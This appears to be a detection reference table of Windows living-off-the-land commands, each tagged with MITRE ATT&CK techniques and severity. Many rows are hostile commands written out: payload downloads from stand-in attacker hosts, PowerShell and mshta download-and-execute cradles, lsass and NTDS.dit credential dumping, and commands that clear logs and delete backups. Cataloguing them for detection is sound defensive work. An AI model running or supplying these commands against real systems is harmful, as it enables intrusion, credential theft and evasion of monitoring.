| rar.exe a -r -[PASS] [OUTPUT.RAR] [FILES TO ZIP] |
63360aff51879d92a525307b |
winrar |
Collection |
T1560, T1560.001 |
Low |
Low |
| rar.exe a -k -r -s -m1 -[PASS] [OUTPUT.RAR] [FILES TO ZIP] |
63360aff51879d92a525307c |
winrar |
Collection |
T1560, T1560.001 |
Low |
Low |
| powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi') |
63360aff51879d92a525307d |
AnyDesk |
Command and Control |
T1105 |
High |
High |
| winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 |
63360aff51879d92a525307e |
winrm |
Defense Evasion, Lateral Movement |
T1216, T1021.006 |
High |
Medium |
| winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 |
63360aff51879d92a525307f |
winrm |
Defense Evasion, Lateral Movement |
T1216, T1021.006 |
High |
Medium |
| %SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty |
63360aff51879d92a5253080 |
winrm |
Defense Evasion, Lateral Movement |
T1216, T1021.006 |
High |
High |
| Msconfig.exe -5 |
63360aff51879d92a5253081 |
msconfig |
Defense Evasion |
T1218 |
Medium |
Medium |
| powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()" |
63360aff51879d92a5253082 |
CL_LoadAssembly |
Defense Evasion |
T1216 |
High |
High |
| runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test |
63360aff51879d92a5253083 |
runscripthelper |
Defense Evasion |
T1218 |
High |
High |
| MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe |
63360aff51879d92a5253084 |
mpcmdrun |
Command and Control |
T1105 |
High |
High |
| copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe |
63360aff51879d92a5253085 |
mpcmdrun |
Command and Control |
T1105 |
High |
High |
| MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe |
63360aff51879d92a5253086 |
mpcmdrun |
Command and Control, Defense Evasion |
T1105, T1564.004 |
High |
High |
| findstr /V /L [PATTERN] c:\ADS\file.exe > c:\ADS\file.txt:file.exe |
63360aff51879d92a5253087 |
findstr |
Defense Evasion |
T1564.004 |
High |
High |
| findstr /V /L [PATTERN] \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe |
63360aff51879d92a5253088 |
findstr |
Defense Evasion |
T1564.004 |
High |
High |
| findstr /S /I cpassword \\sysvol\policies\*.xml |
63360aff51879d92a5253089 |
findstr |
Credential Access |
T1552.001 |
Critical |
High |
| rcsi.exe bypass.csx |
63360aff51879d92a525308a |
rcsi |
Defense Evasion |
T1127 |
High |
High |
| te.exe bypass.wsc |
63360aff51879d92a525308b |
te |
Defense Evasion |
T1127 |
High |
High |
| csc.exe -out:My.exe File.cs |
63360aff51879d92a525308c |
csc |
Execution |
T1127 |
High |
Medium |
| csc -target:library File.cs |
63360aff51879d92a525308d |
csc |
Execution |
T1127 |
High |
Medium |
| taskkill /IM [IMAGENAME] /F |
63360aff51879d92a525308e |
taskkill |
Defense Evasion |
T1562.001 |
High |
High |
| taskkill [/s <computer> [/u [<domain>\]<username> [/p [<password>]]]] {[/fi <filter>] [...] [/pid <processID> | /im <imagename>]} [/f] [/t] |
63360aff51879d92a525308f |
taskkill |
Defense Evasion |
T1562.001 |
High |
High |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe |
63360aff51879d92a5253090 |
extrac32 |
Defense Evasion |
T1564.004 |
High |
High |
| extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe |
63360aff51879d92a5253091 |
extrac32 |
Defense Evasion, Command and Control |
T1564.004, T1105 |
High |
High |
| extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe |
63360aff51879d92a5253092 |
extrac32 |
Command and Control |
T1105 |
High |
High |
| rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" |
63360aff51879d92a5253093 |
shdocvw |
Defense Evasion |
T1218.011 |
High |
High |
| fltmc.exe unload [DRIVER] |
63360aff51879d92a5253094 |
fltmc |
Defense Evasion |
T1562.001 |
High |
High |
| fltmc.exe | findstr "385201" |
63360aff51879d92a5253095 |
fltmc |
Discovery |
T1007 |
High |
High |
| SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" |
63360aff51879d92a5253096 |
Syncappvpublishingserver_vbs |
Defense Evasion |
T1216 |
High |
High |
| CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt |
63360aff51879d92a5253097 |
CertReq |
Command and Control, Exfiltration |
T1105, T1048 |
Medium |
High |
| wfc.exe c:\path\to\test.xoml |
63360aff51879d92a5253098 |
wfc |
Defense Evasion |
T1127 |
High |
High |
| schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe |
63360aff51879d92a5253099 |
schtasks |
Execution, Persistence, Privilege Escalation |
T1053.005 |
Medium |
Low |
| schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily |
63360aff51879d92a525309a |
schtasks |
Execution, Persistence, Privilege Escalation |
T1053.005 |
Medium |
Low |
| C:\Windows\system32\schtasks.exe /create /tn “[ANY NAME]” /tr “\”[ANY BINARY]” --scheduler” /sc ONSTART /ru System |
63360aff51879d92a525309b |
schtasks |
Execution, Persistence, Privilege Escalation, Impact |
T1053.005, T1490 |
High |
Medium |
| wsreset.exe |
63360aff51879d92a525309c |
wsreset |
Privilege Escalation, Defense Evasion |
T1548.002, T1218 |
High |
High |
| regsvcs.exe AllTheThingsx64.dll |
63360aff51879d92a525309d |
regsvcs |
Defense Evasion |
T1218.009 |
High |
High |
| set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
63360aff51879d92a525309e |
manage-bde |
Defense Evasion |
T1216 |
High |
High |
| copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf |
63360aff51879d92a525309f |
manage-bde |
Defense Evasion |
T1216, T1036.005 |
High |
High |
| cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat |
63360aff51879d92a52530a0 |
cmd |
Execution, Defense Evasion |
T1059.003, T1564.004 |
High |
High |
| cmd.exe - < fakefile.doc:payload.bat |
63360aff51879d92a52530a1 |
cmd |
Execution, Defense Evasion |
T1059.003, T1564.004 |
High |
High |
| ATBroker.exe /start [MALWARE] |
63360aff51879d92a52530a2 |
ATBroker |
Defense Evasion |
T1218 |
High |
High |
| dnx.exe consoleapp |
63360aff51879d92a52530a3 |
dnx |
Defense Evasion |
T1127 |
High |
High |
| diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab |
63360aff51879d92a52530a4 |
diantz |
Defense Evasion, Collection |
T1564.004, T1560 |
Medium |
High |
| diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab |
63360aff51879d92a52530a5 |
diantz |
Collection, Command and Control |
T1560, T1105 |
Medium |
High |
| extexport.exe c:\test foo bar |
63360aff51879d92a52530a6 |
ExtExport |
Defense Evasion |
T1218 |
High |
High |
| esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o |
63360aff51879d92a52530a7 |
esentutl |
Command and Control |
T1105 |
High |
High |
| esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit |
63360aff51879d92a52530a8 |
esentutl |
Credential Access |
T1003.003 |
Critical |
High |
| esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o |
63360aff51879d92a52530a9 |
esentutl |
Defense Evasion |
T1564.004 |
High |
High |
| esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o |
63360aff51879d92a52530aa |
esentutl |
Defense Evasion |
T1564.004 |
High |
High |
| esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o |
63360aff51879d92a52530ab |
esentutl |
Defense Evasion, Command and Control |
T1564.004, T1105 |
High |
High |
| esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o |
63360aff51879d92a52530ac |
esentutl |
Command and Control |
T1105 |
High |
High |
| Register-cimprovider -path "C:\folder\evil.dll" |
63360aff51879d92a52530ad |
Register-cimprovider |
Defense Evasion |
T1218 |
High |
High |
| net user |
63360aff51879d92a52530ae |
net |
Discovery |
T1087.001 |
Low |
Low |
| net user [username] [password] /add |
63360aff51879d92a52530af |
net |
Persistence |
T1136.001, T1136.002 |
Low |
Low |
| net group "Domain Admins" /domain |
63360aff51879d92a52530b0 |
net |
Discovery |
T1069.002 |
Low |
High |
| net group "Enterprise Admins" /domain |
63360aff51879d92a52530b1 |
net |
Discovery |
T1069.002 |
Low |
High |
| net group "Domain Users" /domain |
63360aff51879d92a52530b2 |
net |
Discovery |
T1087.002 |
Low |
High |
| net group "Domain Computers" /domain |
63360aff51879d92a52530b3 |
net |
Discovery |
T1087.002 |
Low |
High |
| net start [Service] |
63360aff51879d92a52530b4 |
net |
Execution |
T1569.002 |
Low |
High |
| net stop [Service] |
63360aff51879d92a52530b5 |
net |
Execution |
T1569.002 |
Low |
High |
| net share |
63360aff51879d92a52530b6 |
net |
Discovery |
T1135 |
Low |
Low |
| net use \\[SERVER\SHARE] /user:[USERNAME] [PASSWORD] |
63360aff51879d92a52530b7 |
net |
Discovery, Lateral Movement |
T1083, T1021.002 |
Low |
Low |
| net config workstation |
63360aff51879d92a52530b8 |
net |
Discovery |
T1082 |
Low |
Low |
| net accounts |
63360aff51879d92a52530b9 |
net |
Discovery |
T1201 |
Low |
Low |
| net time /domain |
63360aff51879d92a52530ba |
net |
Discovery |
T1124 |
Low |
Low |
| net localgroup Administrators |
63360aff51879d92a52530bb |
net |
Discovery |
T1087.001 |
Low |
Low |
| net localgroup Administrators [USER] /add |
63360aff51879d92a52530bc |
net |
Discovery |
T1136.001 |
High |
High |
| net view /all /domain |
63360aff51879d92a52530bd |
net |
Discovery |
T1135, T1018 |
High |
High |
| rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf |
63360aff51879d92a52530be |
setupapi |
Defense Evasion |
T1218.011 |
High |
High |
| OfflineScannerShell.exe |
63360aff51879d92a52530bf |
OfflineScannerShell |
Defense Evasion, Persistence, Privilege Escalation |
T1218, T1574.002 |
Medium |
Medium |
| wscript c:\ads\file.txt:script.vbs |
63360aff51879d92a52530c0 |
wscript |
Defense Evasion, Execution |
T1564.004, T1059.005 |
High |
High |
| echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js |
63360aff51879d92a52530c1 |
wscript |
Defense Evasion, Execution, Command and Control |
T1564.004, T1059.005, T1105 |
High |
High |
| cmdkey /list |
63360aff51879d92a52530c2 |
cmdkey |
Credential Access |
T1003, T1003.005 |
High |
High |
| csi.exe [TARGET FILE] |
63360aff51879d92a52530c3 |
csi |
Defense Evasion |
T1127 |
High |
Medium |
| certoc.exe -LoadDLL "C:\test\calc.dll" |
63360aff51879d92a52530c4 |
certoc |
Execution |
T1218 |
High |
High |
| certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 |
63360aff51879d92a52530c5 |
certoc |
Command and Control |
T1105 |
High |
High |
| psr.exe /start /output D:\test.zip /sc 1 /gui 0 |
63360aff51879d92a52530c6 |
psr |
Collection |
T1113 |
High |
Medium |
| dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll |
63360aff51879d92a52530c7 |
dnscmd |
Persistence, Privilege Escalation |
T1543.003 |
Critical |
High |
| forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
63360aff51879d92a52530c8 |
forfiles |
Defense Evasion |
T1202 |
Medium |
Medium |
| forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" |
63360aff51879d92a52530c9 |
forfiles |
Defense Evasion |
T1202, T1564.004 |
Medium |
Medium |
| cmdl32 /vpn /lan %cd%\config |
63360aff51879d92a52530ca |
cmdl32 |
Command and Control |
T1105 |
High |
High |
| explorer.exe /root,"C:\Windows\System32\calc.exe" |
63360aff51879d92a52530cb |
explorer |
Defense Evasion |
T1202 |
High |
High |
| explorer.exe C:\Windows\System32\notepad.exe |
63360aff51879d92a52530cc |
explorer |
Defense Evasion |
T1202 |
High |
High |
| Pester.bat [/help|?|-?|/?] "$null; notepad" |
63360aff51879d92a52530cd |
pester |
Defense Evasion |
T1216 |
High |
High |
| Pester.bat ;calc.exe |
63360aff51879d92a52530ce |
pester |
Defense Evasion |
T1216 |
High |
High |
| C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw |
63360aff51879d92a52530cf |
imewdbld |
Command and Control |
T1105 |
High |
High |
| cscript c:\ads\file.txt:script.vbs |
63360aff51879d92a52530d0 |
cscript |
Defense Evasion, Execution |
T1564.004, T1216, T1059.005 |
High |
High |
| rdrleakdiag.exe /p [PID] /o c:\evil /fullmemdmp /wait 1 |
63360aff51879d92a52530d1 |
rdrleakdiag |
Credential Access |
T1003, T1003.001 |
High |
High |
| regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll |
63360aff51879d92a52530d2 |
regsvr32 |
Defense Evasion, Command and Control |
T1218.010, T1105 |
Critical |
High |
| pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf |
63360aff51879d92a52530d3 |
pnputil |
Persistence, Privilege Escalation |
T1547 |
High |
High |
| squirrel.exe --download [URL TO PACKAGE] |
63360aff51879d92a52530d4 |
squirrel |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| squirrel.exe --updateRoolback=[url to package] |
63360aff51879d92a52530d5 |
squirrel |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| verclsid.exe /S /C {CLSID} |
63360aff51879d92a52530d6 |
verclsid |
Defense Evasion |
T1218.012 |
High |
High |
| ssh localhost calc.exe |
63360aff51879d92a52530d7 |
ssh |
Defense Evasion |
T1202, T1218 |
High |
High |
| fsutil.exe file setZeroData offset=0 length=9999999999 C:\Windows\Temp\payload.dll |
63360aff51879d92a52530d8 |
fsutil |
Impact, Defense Evasion |
T1485, T1070.004 |
High |
High |
| fsutil.exe usn deletejournal /d c: |
63360aff51879d92a52530d9 |
fsutil |
Impact, Defense Evasion |
T1485, T1070.004 |
High |
High |
| rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, |
63360aff51879d92a52530da |
advpack |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe advpack.dll,RegisterOCX test.dll |
63360aff51879d92a52530db |
advpack |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe advpack.dll,RegisterOCX calc.exe |
63360aff51879d92a52530dc |
advpack |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
63360aff51879d92a52530dd |
advpack |
Defense Evasion |
T1218.011 |
High |
High |
| pktmon.exe start --etw |
63360aff51879d92a52530de |
pktmon |
Credential Access, Discovery |
T1040 |
High |
Low |
| pktmon.exe filter add -p 445 |
63360aff51879d92a52530df |
pktmon |
Credential Access, Discovery |
T1040 |
High |
Low |
| ilasm.exe C:\public\test.txt /exe |
63360aff51879d92a52530e0 |
ilasm |
Defense Evasion |
T1127 |
Medium |
Medium |
| cdb.exe -cf x64_calc.wds -o notepad.exe |
63360aff51879d92a52530e1 |
cdb |
Defense Evasion |
T1127 |
High |
High |
| cdb.exe -pd -pn <process_name> .shell <cmd> |
63360aff51879d92a52530e2 |
cdb |
Defense Evasion |
T1127 |
High |
High |
| ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q |
63360aff51879d92a52530e3 |
ntdsutil |
Credential Access |
T1003.003 |
Critical |
High |
| wab.exe |
63360aff51879d92a52530e4 |
wab |
Defense Evasion |
T1218 |
High |
High |
| netsh.exe add helper C:\Users\User\file.dll |
63360aff51879d92a52530e5 |
netsh |
Privilege Escalation, Persistence |
T1546.007 |
High |
High |
| mstsc.exe /control /noConsentPrompt /shadow:1 /v:localhost |
63360aff51879d92a52530e6 |
mstsc |
Lateral Movement |
T1021 |
High |
High |
| bginfo.exe bginfo.bgi /popup /nolicprompt |
63360aff51879d92a52530e7 |
bginfo |
Defense Evasion |
T1218 |
Medium |
Medium |
| \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt |
63360aff51879d92a52530e8 |
bginfo |
Defense Evasion |
T1218 |
Medium |
Medium |
| Tracker.exe /d .\calc.dll /c C:\Windows\write.exe |
63360aff51879d92a52530e9 |
tracker |
Defense Evasion, Privilege Escalation |
T1127, T1055.001 |
High |
High |
| netstat -anob |
63360aff51879d92a52530ea |
netstat |
Discovery |
T1049 |
Low |
Low |
| regini [ConfigFile] |
63360b0051879d92a52530eb |
regini |
Defense Evasion |
T1112 |
High |
High |
| regini -m [\\ComputerName] [ConfigFile] |
63360b0051879d92a52530ec |
regini |
Defense Evasion |
T1112 |
High |
High |
| dotnet.exe [PATH_TO_DLL] |
63360b0051879d92a52530ed |
dotnet |
Defense Evasion |
T1218 |
High |
Medium |
| dotnet.exe msbuild [Path_TO_XML_CSPROJ] |
63360b0051879d92a52530ee |
dotnet |
Defense Evasion |
T1218 |
High |
Medium |
| rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
63360b0051879d92a52530ef |
zipfldr |
Defense Evasion |
T1218.011, T1027 |
High |
High |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u |
63360b0051879d92a52530f0 |
aspnet_compiler |
Defense Evasion |
T1127 |
High |
High |
| Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" |
63360b0051879d92a52530f1 |
powerpnt |
Command and Control |
T1105 |
High |
High |
| wevtutil clear-log [LOGNAME] |
63360b0051879d92a52530f2 |
wevtutil |
Defense Evasion |
T1562.002, T1070 |
High |
High |
| wevtutil cl [LOGNAME] |
63360b0051879d92a52530f3 |
wevtutil |
Defense Evasion |
T1562.002, T1070 |
High |
High |
| wevtutil sl [LOGNAME] /e:false |
63360b0051879d92a52530f4 |
wevtutil |
Defense Evasion |
T1562.002, T1070 |
High |
High |
| wsl.exe -e /mnt/c/Windows/System32/calc.exe |
63360b0051879d92a52530f5 |
wsl |
Defense Evasion |
T1202 |
High |
High |
| wsl.exe -u root -e cat /etc/shadow |
63360b0051879d92a52530f6 |
wsl |
Defense Evasion, Credential Access |
T1202, T1003.008 |
Critical |
High |
| wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' |
63360b0051879d92a52530f7 |
wsl |
Defense Evasion, Command and Control |
T1202, T1105 |
High |
High |
| wbadmin delete catalog -quiet |
63360b0051879d92a52530f8 |
wbadmin |
Impact |
T1490 |
Critical |
High |
| wbadmin delete systemstatebackup -keepversions:0 |
63360b0051879d92a52530f9 |
wbadmin |
Impact |
T1490 |
Critical |
High |
| dump64.exe <pid> out.dmp |
63360b0051879d92a52530fa |
dump64 |
Credential Access |
T1003.001 |
High |
High |
| auditpol /set /category:"Detailed Tracking" /success:disable /failure:disable |
63360b0051879d92a52530fb |
auditpol |
Defense Evasion |
T1562.002 |
Medium |
High |
| auditpol /remove /allusers |
63360b0051879d92a52530fc |
auditpol |
Defense Evasion |
T1562.002 |
Medium |
High |
| auditpol /restore /file:[RestoreFile] |
63360b0051879d92a52530fd |
auditpol |
Defense Evasion |
T1562.002 |
Medium |
High |
| auditpol /clear /y |
63360b0051879d92a52530fe |
auditpol |
Defense Evasion |
T1562.002 |
Medium |
High |
| cmstp.exe /ni /s c:\cmstp\CorpVPN.inf |
63360b0051879d92a52530ff |
cmstp |
Defense Evasion |
T1218.003 |
High |
High |
| cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf |
63360b0051879d92a5253100 |
cmstp |
Defense Evasion |
T1218.003 |
High |
High |
| cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt |
63360b0051879d92a5253101 |
cmstp |
Defense Evasion |
T1218.003 |
High |
High |
| Update.exe --download [URL TO PACKAGE] |
63360b0051879d92a5253102 |
Update |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| Update.exe --update=[url to package] |
63360b0051879d92a5253103 |
Update |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| Update.exe --processStart payload.exe --process-start-args "whatever args" |
63360b0051879d92a5253104 |
Update |
Defense Evasion |
T1218 |
High |
High |
| Update.exe --createShortcut=payload.exe -l=Startup |
63360b0051879d92a5253105 |
Update |
Defense Evasion, Persistence, Privilege Escalation |
T1218, T1547 |
High |
High |
| odbcconf -f file.rsp |
63360b0051879d92a5253106 |
odbcconf |
Defense Evasion |
T1218.008 |
High |
High |
| odbcconf /a {REGSVR c:\test\test.dll} |
63360b0051879d92a5253107 |
odbcconf |
Defense Evasion |
T1218.008 |
High |
High |
| pcalua.exe -a calc.exe |
63360b0051879d92a5253108 |
pcalua |
Defense Evasion |
T1202 |
High |
High |
| pcalua.exe -a \\server\payload.dll |
63360b0051879d92a5253109 |
pcalua |
Defense Evasion, Command and Control |
T1202, T1105 |
High |
High |
| pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java |
63360b0051879d92a525310a |
pcalua |
Defense Evasion |
T1202, T1218.002 |
High |
High |
| Sqlps.exe -noprofile |
63360b0051879d92a525310b |
sqlps |
Defense Evasion |
T1218 |
High |
High |
| powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://attacker.com/payload.txt')|iex" |
63360b0051879d92a525310c |
PowerShell |
Execution, Command and Control |
T1059.001, T1105 |
High |
High |
| powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/Pause-Process/master/pause-process.ps1');Pause-Process -ID 1180;UnPause-Process -ID 1180;" |
63360b0051879d92a525310d |
PowerShell |
Execution |
T1059.001 |
High |
High |
| powershell -command ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke <executable> [args]" |
63360b0051879d92a525310e |
CL_Invocation |
Defense Evasion |
T1216 |
High |
High |
| pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct |
63360b0051879d92a525310f |
pubprn |
Defense Evasion |
T1216.001 |
High |
High |
| sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice |
63360b0051879d92a5253110 |
sc |
Defense Evasion, Execution |
T1564.004, T1569.002 |
High |
Medium |
| Excel.exe http://192.168.1.10/TeamsAddinLoader.dll |
63360b0051879d92a5253111 |
excel |
Command and Control |
T1105 |
High |
High |
| stordiag.exe |
63360b0051879d92a5253112 |
Stordiag |
Defense Evasion |
T1218 |
Medium |
High |
| Dxcap.exe -c C:\Windows\System32\notepad.exe |
63360b0051879d92a5253113 |
dxcap |
Defense Evasion |
T1127 |
High |
High |
| msbuild.exe pshell.xml |
63360b0051879d92a5253114 |
msbuild |
Defense Evasion |
T1127.001 |
Low |
Medium |
| msbuild.exe project.csproj |
63360b0051879d92a5253115 |
msbuild |
Defense Evasion |
T1127.001 |
Low |
Medium |
| msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo |
63360b0051879d92a5253116 |
msbuild |
Defense Evasion |
T1127.001 |
High |
High |
| finger user@example.host.com | more +2 | cmd |
63360b0051879d92a5253117 |
finger |
Command and Control |
T1105 |
High |
High |
| msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE |
63360b0051879d92a5253118 |
msdt |
Defense Evasion |
T1218 |
High |
High |
| powershell -command ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1" |
63360b0051879d92a5253119 |
CL_Mutexverifiers |
Defense Evasion |
T1216 |
High |
High |
| set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr |
63360b0051879d92a525311a |
DesktopImgDownldr |
Command and Control |
T1105 |
High |
High |
| PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip |
63360b0051879d92a525311b |
printbrm |
Command and Control, Collection |
T1105, T1560.001 |
High |
High |
| PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder |
63360b0051879d92a525311c |
printbrm |
Command and Control, Collection, Defense Evasion |
T1105, T1560.001, T1564.004 |
High |
High |
| mshta [filename.hta] |
63360b0051879d92a525311d |
mshta |
Defense Evasion |
T1218.005 |
High |
High |
| mshta vbscript:Execute("[Commands/Script]") |
63360b0051879d92a525311e |
mshta |
Defense Evasion |
T1218.005 |
High |
High |
| mshta.exe "[Inline HTA Script]" |
63360b0051879d92a525311f |
mshta |
Defense Evasion |
T1218.005 |
High |
High |
| mshta.exe [http://malware_url] |
63360b0051879d92a5253120 |
mshta |
Defense Evasion |
T1218.005 |
High |
High |
| mshta javascript:[Commands/Script] |
63360b0051879d92a5253121 |
mshta |
Defense Evasion |
T1218.005 |
High |
High |
| schtasks /create /sc MINUTE /mo 100 /tn eScan Backup /tr ""mshta vbscript:CreateObject(""Wscript.Shell"").Run(""mshta.exe hxxps://pastebin[.]com/raw/XXXXXXX"",0,true)(window.close)"" /F |
63360b0051879d92a5253122 |
mshta |
Defense Evasion, Execution, Persistence, Privilege Escalation |
T1218.005, T1053.005 |
High |
High |
| mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run(""powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString(\'h\'+\'x\'+\'x\'+\'p\'+\'s:\'+\'//p\'+\'a\'+\'s\'+\'t\'+\'e\'+\'b\'+\'i\'+\'n\'+\'.\'+\'c\'+\'o\'+\'m\'+\'/\'+\'r\'+\'a\'+\'w\'+\'/\'+\'XXXXXXXX\'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close) |
63360b0051879d92a5253123 |
mshta |
Defense Evasion, Execution |
T1218.005, T1059.001 |
High |
High |
| mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); |
63360b0051879d92a5253124 |
mshta |
Defense Evasion |
T1218.005 |
High |
High |
| rundll32.exe shell32.dll,Control_RunDLL [payload.dll | payload.exe | "cmd.exe" "/c echo test"] |
63360b0051879d92a5253125 |
shell32 |
Defense Evasion |
T1218.011 |
High |
High |
| msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" |
63360b0051879d92a5253126 |
msdeploy |
Defense Evasion |
T1218 |
High |
High |
| adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet |
63360b0051879d92a5253127 |
adplus |
Credential Access |
T1003.001 |
Critical |
High |
| rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr |
63360b0051879d92a5253128 |
desk |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr |
63360b0051879d92a5253129 |
desk |
Defense Evasion, Command and Control |
T1218.011, T1105 |
High |
High |
| AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 |
63360b0051879d92a525312a |
AgentExecutor |
Defense Evasion, Execution |
T1218, T1059.001 |
High |
High |
| AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 |
63360b0051879d92a525312b |
AgentExecutor |
Defense Evasion, Execution |
T1218, T1059.001 |
High |
High |
| Remote.exe /s "powershell.exe" [ANY ARGUMENTS/COMMANDS] |
63360b0051879d92a525312c |
remote |
Defense Evasion |
T1127 |
High |
High |
